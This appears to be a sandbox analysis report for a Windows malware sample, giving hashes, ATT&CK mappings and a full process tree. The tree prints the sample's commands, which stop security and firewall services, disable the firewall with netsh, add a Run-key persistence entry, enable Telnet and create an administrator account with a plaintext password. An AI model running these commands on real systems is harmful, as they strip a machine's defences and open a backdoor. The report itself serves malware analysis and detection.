be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913

Analysis

max time kernel
143s
max time network
203s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
06-12-2022 02:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
Size

404KB
MD5

5e092c515f6f47a16d70407410ab4577
SHA1

5b3b364c29c7a833c9de8bda9cc109a7e14194cc
SHA256

be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913
SHA512

ae112ce5b34905b538e4753fbfb6b2346c47e3079613c6600591100ae52a0664a952c2a2a96dec32639358b27cb8376ea7f73f5d89cf3d9b495de88686582f73
SSDEEP

6144:sLHMgD1LBUpzEtSLA7I85O2AGwbIPLN9MyKMCjlHzgD:BgvVtSU8cS69My0g

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1320	netsh.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.NET = "C:\\Windows\\system\\lssm.exe"	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system\d1ctt.dll	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
File opened for modification	C:\Windows\k1.Reg	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
File opened for modification	C:\Windows\exec.bat	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
File created	C:\Windows\system\lssm.exe	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
File opened for modification	C:\Windows\system\lssm.exe	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1636	sc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Processornamestring	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
992	taskkill.exe
1956	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1116	regedit.exe
1504	regedit.exe

Runs net.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1084 wrote to memory of 992	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	27
PID 1084 wrote to memory of 992	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	27
PID 1084 wrote to memory of 992	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	27
PID 1084 wrote to memory of 992	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	27
PID 1084 wrote to memory of 1724	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	29
PID 1084 wrote to memory of 1724	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	29
PID 1084 wrote to memory of 1724	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	29
PID 1084 wrote to memory of 1724	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	29
PID 1084 wrote to memory of 1060	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	31
PID 1084 wrote to memory of 1060	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	31
PID 1084 wrote to memory of 1060	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	31
PID 1084 wrote to memory of 1060	1084	be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe	31
PID 1724 wrote to memory of 2000	1724	cmd.exe	33
PID 1724 wrote to memory of 2000	1724	cmd.exe	33
PID 1724 wrote to memory of 2000	1724	cmd.exe	33
PID 1724 wrote to memory of 2000	1724	cmd.exe	33
PID 1060 wrote to memory of 1956	1060	cmd.exe	34
PID 1060 wrote to memory of 1956	1060	cmd.exe	34
PID 1060 wrote to memory of 1956	1060	cmd.exe	34
PID 1060 wrote to memory of 1956	1060	cmd.exe	34
PID 2000 wrote to memory of 584	2000	net.exe	35
PID 2000 wrote to memory of 584	2000	net.exe	35
PID 2000 wrote to memory of 584	2000	net.exe	35
PID 2000 wrote to memory of 584	2000	net.exe	35
PID 1724 wrote to memory of 828	1724	cmd.exe	36
PID 1724 wrote to memory of 828	1724	cmd.exe	36
PID 1724 wrote to memory of 828	1724	cmd.exe	36
PID 1724 wrote to memory of 828	1724	cmd.exe	36
PID 828 wrote to memory of 1804	828	net.exe	37
PID 828 wrote to memory of 1804	828	net.exe	37
PID 828 wrote to memory of 1804	828	net.exe	37
PID 828 wrote to memory of 1804	828	net.exe	37
PID 1724 wrote to memory of 1568	1724	cmd.exe	38
PID 1724 wrote to memory of 1568	1724	cmd.exe	38
PID 1724 wrote to memory of 1568	1724	cmd.exe	38
PID 1724 wrote to memory of 1568	1724	cmd.exe	38
PID 1568 wrote to memory of 552	1568	net.exe	39
PID 1568 wrote to memory of 552	1568	net.exe	39
PID 1568 wrote to memory of 552	1568	net.exe	39
PID 1568 wrote to memory of 552	1568	net.exe	39
PID 1724 wrote to memory of 672	1724	cmd.exe	41
PID 1724 wrote to memory of 672	1724	cmd.exe	41
PID 1724 wrote to memory of 672	1724	cmd.exe	41
PID 1724 wrote to memory of 672	1724	cmd.exe	41
PID 672 wrote to memory of 2012	672	net.exe	42
PID 672 wrote to memory of 2012	672	net.exe	42
PID 672 wrote to memory of 2012	672	net.exe	42
PID 672 wrote to memory of 2012	672	net.exe	42
PID 1724 wrote to memory of 1320	1724	cmd.exe	43
PID 1724 wrote to memory of 1320	1724	cmd.exe	43
PID 1724 wrote to memory of 1320	1724	cmd.exe	43
PID 1724 wrote to memory of 1320	1724	cmd.exe	43
PID 1060 wrote to memory of 1636	1060	cmd.exe	44
PID 1060 wrote to memory of 1636	1060	cmd.exe	44
PID 1060 wrote to memory of 1636	1060	cmd.exe	44
PID 1060 wrote to memory of 1636	1060	cmd.exe	44
PID 1060 wrote to memory of 1208	1060	cmd.exe	45
PID 1060 wrote to memory of 1208	1060	cmd.exe	45
PID 1060 wrote to memory of 1208	1060	cmd.exe	45
PID 1060 wrote to memory of 1208	1060	cmd.exe	45
PID 1060 wrote to memory of 1504	1060	cmd.exe	46
PID 1060 wrote to memory of 1504	1060	cmd.exe	46
PID 1060 wrote to memory of 1504	1060	cmd.exe	46
PID 1060 wrote to memory of 1504	1060	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
"C:\Users\Admin\AppData\Local\Temp\be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe"
1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /im WinPatrol.exe /f /t
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\exec.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\net.exe
    net stop Security Center
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Security Center
      4⤵
      PID:584
- - C:\Windows\SysWOW64\net.exe
    net start SharedAccess
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SharedAccess
      4⤵
      PID:1804
- - C:\Windows\SysWOW64\net.exe
    net stop Micorsoft Network Firewall Service
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Micorsoft Network Firewall Service
      4⤵
      PID:552
- - C:\Windows\SysWOW64\net.exe
    net stop "Windows Firewall/Internet Connection Sharing (ICS)"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:672
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Windows Firewall/Internet Connection Sharing (ICS)"
      4⤵
      PID:2012
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:1320
- - C:\Windows\SysWOW64\regedit.exe
    regedit /sk1.Reg
    3⤵
    - Runs .reg file with regedit
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\t3l.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tlntsvr.exe /f /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- - C:\Windows\SysWOW64\sc.exe
    sc config TlntSvr start= auto
    3⤵
    - Launches sc.exe
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    REG IMPORT keyADD.reg
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\regedit.exe
    REGEDIT.EXE /s keyADD.reg
    3⤵
    - Runs .reg file with regedit
    PID:1504
- - C:\Windows\SysWOW64\net.exe
    NET LOCALGROUP TelnetClients /ADD
    3⤵
    PID:1360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 LOCALGROUP TelnetClients /ADD
      4⤵
      PID:1556
- - C:\Windows\SysWOW64\net.exe
    NET LOCALGROUP TelnetClients Administrator /ADD
    3⤵
    PID:632
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 LOCALGROUP TelnetClients Administrator /ADD
      4⤵
      PID:568
- - C:\Windows\SysWOW64\net.exe
    NET LOCALGROUP Administrators Administrator /ADD
    3⤵
    PID:432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 LOCALGROUP Administrators Administrator /ADD
      4⤵
      PID:456
- - C:\Windows\SysWOW64\net.exe
    NET USER administrator nebunu001 /add
    3⤵
    PID:112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 USER administrator nebunu001 /add
      4⤵
      PID:1200
- - C:\Windows\SysWOW64\net.exe
    net USER administrator nebunu001
    3⤵
    PID:1076
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 USER administrator nebunu001
      4⤵
      PID:1840
- - C:\Windows\SysWOW64\net.exe
    net start TlntSvr
    3⤵
    PID:1612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start TlntSvr
      4⤵
      PID:1660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\keyADD.reg

Filesize
899B

MD5
fd1d5cb5341d5308bdaaf1178c165cbf

SHA1
fc4ce8540aa0cbe164812a8e6b66ebc5911fdbef

SHA256
5f2f60c51e57055275330a1a1559b1283bfb1fd24a7a452f9b541355f9871e45

SHA512
844404b4c71402691b4babb53ac030dbc8c996718935c5d3855e51d7ec681fc511b0f44734931b8ac7f2898feeba5881c931c255eda9fbe65035fc2393c3fdfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\t3l.bat

Filesize
394B

MD5
8c2bc98974858dfaaa46eac37926aec6

SHA1
e48171c2422edee6abe18a942ca97d283d065df0

SHA256
0109517d6908e778ee5480d8789575fb737fb9636bf4cfe517d562b8fbaecb87

SHA512
7cc3f89baceffcc99aa65be71dc97a61b243a0ea36c3842ddbc029ee1475b8a97266d9a127551b771f56a7ff06a1c84f05d5e4bd461731b90bae27f4a7694e75

Download Submit
C:\Windows\exec.bat

Filesize
281B

MD5
281504796ab276be9b4725ce7143ee6d

SHA1
5e47b5e152a4ebb92e397de2c4defd0395028c8b

SHA256
d6e7f799fc9a879fd2009006c570a3ef034b8da092dc23ef73f1259ec38e5946

SHA512
e301eaf63468c7c364bfaa83ef0c6cc69fd4879a5f12f2968fa06207b6a149af4eb1340cd1ea690a14bbcbb07764453e901f94c5d991e97c8b1cb509469ad9bf

Download Submit
memory/112-85-0x0000000000000000-mapping.dmp

Download
memory/432-82-0x0000000000000000-mapping.dmp

Download
memory/456-83-0x0000000000000000-mapping.dmp

Download
memory/552-69-0x0000000000000000-mapping.dmp

Download
memory/568-81-0x0000000000000000-mapping.dmp

Download
memory/584-65-0x0000000000000000-mapping.dmp

Download
memory/632-80-0x0000000000000000-mapping.dmp

Download
memory/672-70-0x0000000000000000-mapping.dmp

Download
memory/828-66-0x0000000000000000-mapping.dmp

Download
memory/992-57-0x0000000000000000-mapping.dmp

Download
memory/1060-59-0x0000000000000000-mapping.dmp

Download
memory/1076-87-0x0000000000000000-mapping.dmp

Download
memory/1084-63-0x0000000076401000-0x0000000076403000-memory.dmp

Filesize
8KB

Download
memory/1116-92-0x0000000000000000-mapping.dmp

Download
memory/1200-86-0x0000000000000000-mapping.dmp

Download
memory/1208-74-0x0000000000000000-mapping.dmp

Download
memory/1320-72-0x0000000000000000-mapping.dmp

Download
memory/1360-78-0x0000000000000000-mapping.dmp

Download
memory/1504-76-0x0000000000000000-mapping.dmp

Download
memory/1556-79-0x0000000000000000-mapping.dmp

Download
memory/1568-68-0x0000000000000000-mapping.dmp

Download
memory/1612-90-0x0000000000000000-mapping.dmp

Download
memory/1636-73-0x0000000000000000-mapping.dmp

Download
memory/1660-91-0x0000000000000000-mapping.dmp

Download
memory/1724-58-0x0000000000000000-mapping.dmp

Download
memory/1804-67-0x0000000000000000-mapping.dmp

Download
memory/1840-88-0x0000000000000000-mapping.dmp

Download
memory/1956-64-0x0000000000000000-mapping.dmp

Download
memory/2000-62-0x0000000000000000-mapping.dmp

Download
memory/2012-71-0x0000000000000000-mapping.dmp

Download